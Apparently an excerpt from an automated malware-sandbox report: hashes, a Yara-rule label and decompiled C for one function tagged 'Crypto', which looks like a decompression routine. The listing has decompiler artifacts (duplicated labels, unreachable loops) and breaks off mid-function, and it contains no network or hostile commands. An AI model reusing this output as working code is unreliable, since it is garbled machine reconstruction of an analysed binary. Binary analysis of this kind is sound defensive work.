              • Opcode ID: af2df980d2fb9de91bedde206c1632d13774fc6c70c42dac78d32a1727c8077f
              • Instruction ID: 3a30eb7dc40d6a2250b625adfcbc63fe49c6d9d0fa993debd74da960059700a3
              • Opcode Fuzzy Hash: af2df980d2fb9de91bedde206c1632d13774fc6c70c42dac78d32a1727c8077f
              • Instruction Fuzzy Hash: F7A001706023018B97409F7AAA093193AE9AA86A91B09916AA609C6664EB34C460AA61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8589E, Relevance: .8, Instructions: 800COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 96%
              			E00D8589E(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E00D847DA(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E00D833D3(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E00D8397F(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00D84422(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E00D7A4ED(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x30) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E00D7A4ED(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E00D7A4ED(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x30);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x30) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E00D8EA80(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E00D820EE();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x30) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E00D8EA80(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x10));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E00D81A0E(_t638, _t658 + 0x1c);
																	__eflags = _t417;
																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
															if(_t322 < 0xf) {
																continue;
															}
															L137:
															goto L139;
														}
														L138:
														_t628 = _t322;
														goto L139;
													}
													L132:
													_t532 = 0x10;
													_t613 = _t605 >> _t532 - _t321;
													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
													 *_t643 =  *_t643 + (_t535 >> 3);
													 *(_t643 + 4) = _t535 & 0x00000007;
													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
													goto L140;
												} else {
													goto L130;
												}
												do {
													L130:
													 *_t493 =  *(_t493 - 4);
													_t493 = _t493 - 4;
													_t461 = _t461 - 1;
													__eflags = _t461;
												} while (_t461 != 0);
												goto L131;
											}
											L103:
											_t632 =  *(_t638 + 0x74);
											_t598 = _t638 + 0x7c;
											__eflags = _t632;
										}
										L97:
										_push(_t658 + 0x1c);
										_t414 = E00D83564(_t638, _t643);
										__eflags = _t414;
										if(_t414 == 0) {
											goto L99;
										}
										goto L98;
									}
									L32:
									_t634 = _t460 - 0x106;
									__eflags = _t634 - 8;
									if(_t634 >= 8) {
										_t478 = (_t634 >> 2) - 1;
										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
										__eflags = _t634;
									} else {
										_t478 = 0;
									}
									_t632 = _t634 + 2;
									__eflags = _t478;
									if(_t478 != 0) {
										_t444 = E00D7A4ED(_t643);
										_t582 = 0x10;
										_t632 = _t632 + (_t444 >> _t582 - _t478);
										_t585 =  *(_t643 + 4) + _t478;
										 *_t643 =  *_t643 + (_t585 >> 3);
										_t586 = _t585 & 0x00000007;
										__eflags = _t586;
										 *(_t643 + 4) = _t586;
									}
									_t418 = E00D7A4ED(_t643);
									_t419 =  *(_t638 + 0x1010);
									_t617 = _t418 & 0x0000fffe;
									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
										L39:
										_t479 = 0xf;
										_t420 = _t419 + 1;
										__eflags = _t420 - _t479;
										if(_t420 >= _t479) {
											L45:
											_t546 =  *(_t643 + 4) + _t479;
											 *(_t643 + 4) = _t546 & 0x00000007;
											_t422 = _t546 >> 3;
											 *_t643 =  *_t643 + _t422;
											_t548 = 0x10;
											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
											asm("sbb eax, eax");
											_t423 = _t422 & _t551;
											__eflags = _t423;
											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
											goto L46;
										}
										L40:
										_t575 = _t638 + (_t420 + 0x3e4) * 4;
										while(1) {
											L41:
											__eflags = _t617 -  *_t575;
											if(_t617 <  *_t575) {
												break;
											}
											L42:
											_t420 = _t420 + 1;
											_t575 = _t575 + 4;
											__eflags = _t420 - 0xf;
											if(_t420 < 0xf) {
												continue;
											}
											L43:
											goto L45;
										}
										L44:
										_t479 = _t420;
										goto L45;
									} else {
										L38:
										_t576 = 0x10;
										_t625 = _t617 >> _t576 - _t419;
										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
										 *_t643 =  *_t643 + (_t579 >> 3);
										 *(_t643 + 4) = _t579 & 0x00000007;
										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
										L46:
										_t425 = _t424 & 0x0000ffff;
										__eflags = _t425 - 4;
										if(_t425 >= 4) {
											_t643 = (_t425 >> 1) - 1;
											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
											__eflags = _t425;
										} else {
											_t643 = 0;
										}
										_t428 = _t425 + 1;
										 *(_t658 + 0x14) = _t428;
										_t471 = _t428;
										 *(_t658 + 0x30) = _t471;
										__eflags = _t643;
										if(_t643 == 0) {
											L64:
											_t643 = _t638 + 4;
											goto L65;
										} else {
											L50:
											__eflags = _t643 - 4;
											if(__eflags < 0) {
												L72:
												_t359 = E00D87D76(_t638 + 4);
												_t514 = 0x20;
												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x14);
												_t517 =  *(_t638 + 8) + _t643;
												 *(_t658 + 0x30) = _t471;
												_t643 = _t638 + 4;
												 *_t643 =  *_t643 + (_t517 >> 3);
												 *(_t643 + 4) = _t517 & 0x00000007;
												L65:
												__eflags = _t471 - 0x100;
												if(_t471 > 0x100) {
													_t632 = _t632 + 1;
													__eflags = _t471 - 0x2000;
													if(_t471 > 0x2000) {
														_t632 = _t632 + 1;
														__eflags = _t471 - 0x40000;
														if(_t471 > 0x40000) {
															_t632 = _t632 + 1;
															__eflags = _t632;
														}
													}
												}
												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
												 *(_t638 + 0x68) =  *(_t638 + 0x64);
												 *(_t638 + 0x64) =  *(_t638 + 0x60);
												 *(_t638 + 0x60) = _t471;
												__eflags =  *((char*)(_t638 + 0x4c44));
												 *(_t638 + 0x74) = _t632;
												if( *((char*)(_t638 + 0x4c44)) == 0) {
													L73:
													_t598 = _t638 + 0x7c;
													_t519 =  *_t598;
													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
													_t651 = _t519 - _t471;
													__eflags = _t651 - _t366;
													if(_t651 >= _t366) {
														L92:
														__eflags = _t632;
														if(_t632 == 0) {
															goto L161;
														}
														L93:
														_t472 =  *(_t638 + 0xe6dc);
														do {
															L94:
															_t473 = _t472 & _t651;
															_t651 = _t651 + 1;
															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
															_t598 = _t638 + 0x7c;
															_t472 =  *(_t638 + 0xe6dc);
															 *_t598 =  *_t598 + 0x00000001 & _t472;
															_t632 = _t632 - 1;
															__eflags = _t632;
														} while (_t632 != 0);
														goto L161;
													}
													L74:
													__eflags = _t519 - _t366;
													if(_t519 >= _t366) {
														goto L92;
													}
													L75:
													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
													_t474 = _t371 + _t651;
													_t652 = _t371 + _t519;
													 *_t598 = _t519 + _t632;
													__eflags =  *(_t658 + 0x30) - _t632;
													if( *(_t658 + 0x30) >= _t632) {
														L80:
														__eflags = _t632 - 8;
														if(_t632 < 8) {
															L84:
															__eflags = _t632;
															if(_t632 != 0) {
																 *_t652 =  *_t474;
																__eflags = _t632 - 1;
																if(_t632 > 1) {
																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
																	__eflags = _t632 - 2;
																	if(_t632 > 2) {
																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
																		__eflags = _t632 - 3;
																		if(_t632 > 3) {
																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
																			__eflags = _t632 - 4;
																			if(_t632 > 4) {
																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
																				__eflags = _t632 - 5;
																				if(_t632 > 5) {
																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 > 6) {
																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L161;
														}
														L81:
														_t381 = _t632 >> 3;
														__eflags = _t381;
														 *(_t658 + 0x30) = _t381;
														_t640 = _t381;
														do {
															L82:
															E00D8EA80(_t652, _t474, 8);
															_t658 = _t658 + 0xc;
															_t474 = _t474 + 8;
															_t652 = _t652 + 8;
															_t632 = _t632 - 8;
															_t640 = _t640 - 1;
															__eflags = _t640;
														} while (_t640 != 0);
														_t638 =  *((intOrPtr*)(_t658 + 0x10));
														_t598 =  *(_t658 + 0x18);
														goto L84;
													}
													L76:
													__eflags = _t632 - 8;
													if(_t632 < 8) {
														goto L84;
													}
													L77:
													_t522 = _t632 >> 3;
													__eflags = _t522;
													do {
														L78:
														_t632 = _t632 - 8;
														 *_t652 =  *_t474;
														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
														_t390 =  *((intOrPtr*)(_t474 + 7));
														_t474 = _t474 + 8;
														 *((char*)(_t652 + 7)) = _t390;
														_t652 = _t652 + 8;
														_t522 = _t522 - 1;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L84;
												} else {
													L70:
													_push( *(_t638 + 0xe6dc));
													_push(_t638 + 0x7c);
													_push(_t471);
													goto L71;
												}
											}
											L51:
											if(__eflags <= 0) {
												_t656 = _t638 + 4;
											} else {
												_t439 = E00D87D76(_t638 + 4);
												_t569 = 0x24;
												_t572 = _t643 - 4 +  *(_t638 + 8);
												_t656 = _t638 + 4;
												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x14);
												 *_t656 =  *_t656 + (_t572 >> 3);
												 *(_t656 + 4) = _t572 & 0x00000007;
											}
											_t429 = E00D7A4ED(_t656);
											_t430 =  *(_t638 + 0x1efc);
											_t621 = _t429 & 0x0000fffe;
											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
												L56:
												_t657 = 0xf;
												_t431 = _t430 + 1;
												__eflags = _t431 - _t657;
												if(_t431 >= _t657) {
													L62:
													_t555 =  *(_t638 + 8) + _t657;
													 *(_t638 + 8) = _t555 & 0x00000007;
													_t433 = _t555 >> 3;
													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
													_t557 = 0x10;
													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
													asm("sbb eax, eax");
													_t434 = _t433 & _t560;
													__eflags = _t434;
													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
													goto L63;
												}
												L57:
												_t562 = _t638 + (_t431 + 0x79f) * 4;
												while(1) {
													L58:
													__eflags = _t621 -  *_t562;
													if(_t621 <  *_t562) {
														break;
													}
													L59:
													_t431 = _t431 + 1;
													_t562 = _t562 + 4;
													__eflags = _t431 - 0xf;
													if(_t431 < 0xf) {
														continue;
													}
													L60:
													goto L62;
												}
												L61:
												_t657 = _t431;
												goto L62;
											} else {
												L55:
												_t563 = 0x10;
												_t624 = _t621 >> _t563 - _t430;
												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
												 *_t656 =  *_t656 + (_t566 >> 3);
												 *(_t656 + 4) = _t566 & 0x00000007;
												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
												L63:
												_t471 = _t471 + (_t435 & 0x0000ffff);
												__eflags = _t471;
												 *(_t658 + 0x30) = _t471;
												goto L64;
											}
										}
									}
								}
								L28:
								__eflags =  *((char*)(_t638 + 0x4c44));
								if( *((char*)(_t638 + 0x4c44)) == 0) {
									L30:
									_t598 = _t638 + 0x7c;
									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
									 *_t598 =  *_t598 + 1;
									continue;
								}
								L29:
								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
								 *(E00D817A5(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
								goto L0;
							}
						}
						L13:
						__eflags = _t483 -  *_t598;
						if(_t483 ==  *_t598) {
							goto L18;
						}
						L14:
